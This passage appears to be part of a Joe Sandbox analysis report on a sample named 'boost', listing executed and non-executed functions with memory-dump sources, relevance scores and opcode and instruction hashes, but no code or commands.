                                                                            • Snapshot File: hcaresult_22_2_7ffaac5a0000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M_^ $M_^"$M_^$$M_^&
                                                                            • API String ID: 0-3382453705
                                                                            • Opcode ID: c12affedf02895ace0a6f42fef37f1a0d890e9e90569d672fa749d6b72b42d53
                                                                            • Instruction ID: 044f3f52f409d654f47f4247d25825973c30c3700c581dcbdd5568b532034bef
                                                                            • Opcode Fuzzy Hash: c12affedf02895ace0a6f42fef37f1a0d890e9e90569d672fa749d6b72b42d53
                                                                            • Instruction Fuzzy Hash: 44411AA295E683CFE20257795CAD0A83FD4EF5261875882FAD0D98B1E3FD24941E8284

                                                                            Executed Functions

                                                                            Function 00007FFAAC5812B9 Relevance: .8, Instructions: 805COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000001A.00000002.2259275092.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_26_2_7ffaac580000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b02a93c21d9aabf9a275b2ee915a07d67fb6c1aba8478a3b575c4abe4586db67
                                                                            • Instruction ID: acc6e22188962aee37c1eaaacee23ee61ff60003b6758666b67051e5cdffdb1c
                                                                            • Opcode Fuzzy Hash: b02a93c21d9aabf9a275b2ee915a07d67fb6c1aba8478a3b575c4abe4586db67
                                                                            • Instruction Fuzzy Hash: 6342F561B6CA0A8FFB94FB38C4596B977D6FF99300F548579E00EC32D6DD28A8058781
                                                                            Function 00007FFAAC581C4D Relevance: .2, Instructions: 196COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000001A.00000002.2259275092.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_26_2_7ffaac580000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cca5aaff53c8c0d0190891d5f3c741c5f77c0235e1327e17d04c4180bd80990e
                                                                            • Instruction ID: 89560b7726fc6900c4614493e4b4b0a5cfc1cc1c9c16acd0f289c4b5cea96e95
                                                                            • Opcode Fuzzy Hash: cca5aaff53c8c0d0190891d5f3c741c5f77c0235e1327e17d04c4180bd80990e
                                                                            • Instruction Fuzzy Hash: DB512351A5E6C64FE786A73898646767FD8EF97215F1804FBE0CDC7293DD08580AC382
                                                                            Function 00007FFAAC580C2E Relevance: .8, Instructions: 773COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000001A.00000002.2259275092.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_26_2_7ffaac580000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 091346d7b539d60db9f6c36194c29b9d778b342409b62beacc3068667516bf3f
                                                                            • Instruction ID: 006215b549e39da888edb377beaf567feb57ab60fb115b8299c074033138b09c
                                                                            • Opcode Fuzzy Hash: 091346d7b539d60db9f6c36194c29b9d778b342409b62beacc3068667516bf3f
                                                                            • Instruction Fuzzy Hash: A9914972A0DA8A8FE745A73CD8665F97BE5EFC6210F0840BAD04DC7193DD18AC4A8391
                                                                            Function 00007FFAAC5804D8 Relevance: .1, Instructions: 137COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000001A.00000002.2259275092.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_26_2_7ffaac580000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e001fc61a9d6f9faebf09e6cc9e12270a1200986eebb9bc7298a0876f4b1ee4e
                                                                            • Instruction ID: f0ae795d320b349ea4d8ade5f82c277cc04de1f5c3ff0cfeb5d3a3900b717e5b
                                                                            • Opcode Fuzzy Hash: e001fc61a9d6f9faebf09e6cc9e12270a1200986eebb9bc7298a0876f4b1ee4e
                                                                            • Instruction Fuzzy Hash: 5031F362B189494FE788FB3CD46AB79B6C6EF99311F1405BAE04EC3293DD649C418381
                                                                            Function 00007FFAAC580AC9 Relevance: .1, Instructions: 124COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000001A.00000002.2259275092.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_26_2_7ffaac580000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b91cb9ce7530119839f81845c69e4a136ff07dbbc4d19d2e9249e5b5ee8f9681
                                                                            • Instruction ID: 037a34c75dc2bcbd74f847c941d8619661fae49a543dc02fe850b960315c1ed1
                                                                            • Opcode Fuzzy Hash: b91cb9ce7530119839f81845c69e4a136ff07dbbc4d19d2e9249e5b5ee8f9681
                                                                            • Instruction Fuzzy Hash: 4231E862B1D90A8FF744B7BC98197BD77D5EFD9311F0481B6E00DC3292DD1899468391
                                                                            Function 00007FFAAC5807F0 Relevance: .1, Instructions: 111COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000001A.00000002.2259275092.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_26_2_7ffaac580000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6e0f814c62c5b6154aab80e389bc48910dc5778ce3808f9b033d837ea8608075
                                                                            • Instruction ID: 40f073f26afd2b7d60a0a815aa7396d755cd81b0c65f2e778cbcdf105ec3fed3
                                                                            • Opcode Fuzzy Hash: 6e0f814c62c5b6154aab80e389bc48910dc5778ce3808f9b033d837ea8608075
                                                                            • Instruction Fuzzy Hash: 0F31C560A5C50E8BD780F728C4698E93BB1EF88344F90C075D50ACB39EDD3868859785
                                                                            Function 00007FFAAC580985 Relevance: .1, Instructions: 111COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000001A.00000002.2259275092.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_26_2_7ffaac580000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a07cd807f37b88ae65fb27928e8d454ddebe53f8ae1337365bb3d106eef06d8e
                                                                            • Instruction ID: cb81c899a98e4dbb9dda898aa160aead52d3dfe5cc4efb5c4f5de94797aa0b4b
                                                                            • Opcode Fuzzy Hash: a07cd807f37b88ae65fb27928e8d454ddebe53f8ae1337365bb3d106eef06d8e
                                                                            • Instruction Fuzzy Hash: 23318071A5860A8FEB84FB78C8656FD77E1FF88300F508574D00ED7296DE38A8458781
                                                                            Function 00007FFAAC580848 Relevance: .1, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000001A.00000002.2259275092.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_26_2_7ffaac580000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 07bd8fb3f79b5ebd00dd2d79a761ed4d72c5b287ad081a30766a6c24b0ba4d62
                                                                            • Instruction ID: 7ef67456d06cae45c2bb8d2535416281293e8654961efc687d8d7afdbf7de675
                                                                            • Opcode Fuzzy Hash: 07bd8fb3f79b5ebd00dd2d79a761ed4d72c5b287ad081a30766a6c24b0ba4d62
                                                                            • Instruction Fuzzy Hash: 27219560A5850E8FDB81FB38C4998A97BB1FF89344F91C075D40ACB39EED38A8458785
                                                                            Function 00007FFAAC581E01 Relevance: .0, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000001A.00000002.2259275092.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_26_2_7ffaac580000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 69b2b0eed939222a579ca1358da70887cf0dd080fa1d7becff454ea6d2fba006
                                                                            • Instruction ID: 5ac94a45f5462eb3830e4633ffcc05cddd434e2b72182db2344a211cc845ee87
                                                                            • Opcode Fuzzy Hash: 69b2b0eed939222a579ca1358da70887cf0dd080fa1d7becff454ea6d2fba006
                                                                            • Instruction Fuzzy Hash: D6014701C0D7C58FE781733858650767FE0CF92261F0881AAE48CCA1D6DC089A8983D2

                                                                            Non-executed Functions

                                                                            Function 00007FFAAC5806FA Relevance: 6.3, Strings: 5, Instructions: 7COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001A.00000002.2259275092.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_26_2_7ffaac580000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: =O_^$O_^ $O_^"$O_^$$O_^&
                                                                            • API String ID: 0-4006681047
                                                                            • Opcode ID: e07c96a6b230aed034173c2d493b291585fd7414c8dd858d85f1f1760f7d5f43
                                                                            • Instruction ID: 3a3b9345a474830c9e58c5a55fc4f6f55357c91d256ce114dcac91cdc195352d
                                                                            • Opcode Fuzzy Hash: e07c96a6b230aed034173c2d493b291585fd7414c8dd858d85f1f1760f7d5f43
                                                                            • Instruction Fuzzy Hash: 5EB012A284C1E353D763227464A50E55FC05F0E66A73C88A2C1EE8A303DC0840156209
                                                                            Function 00007FFAAC580688 Relevance: 5.1, Strings: 4, Instructions: 130COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001A.00000002.2259275092.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_26_2_7ffaac580000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: O_^ $O_^"$O_^$$O_^&
                                                                            • API String ID: 0-3636004760
                                                                            • Opcode ID: 2f587b3bbdd7aefd884134cae10d5842392ef9bb903b454360fcf743d34fdd24
                                                                            • Instruction ID: aa970394c2426911eaac9d50bce17aeafd86476e2348b5dd1f6059d0a77cd3b4
                                                                            • Opcode Fuzzy Hash: 2f587b3bbdd7aefd884134cae10d5842392ef9bb903b454360fcf743d34fdd24
                                                                            • Instruction Fuzzy Hash: 6C412AB394E2828FF20257785CA50F83FD4EF92319B1881BAD0CD8E293ED24951AD3C4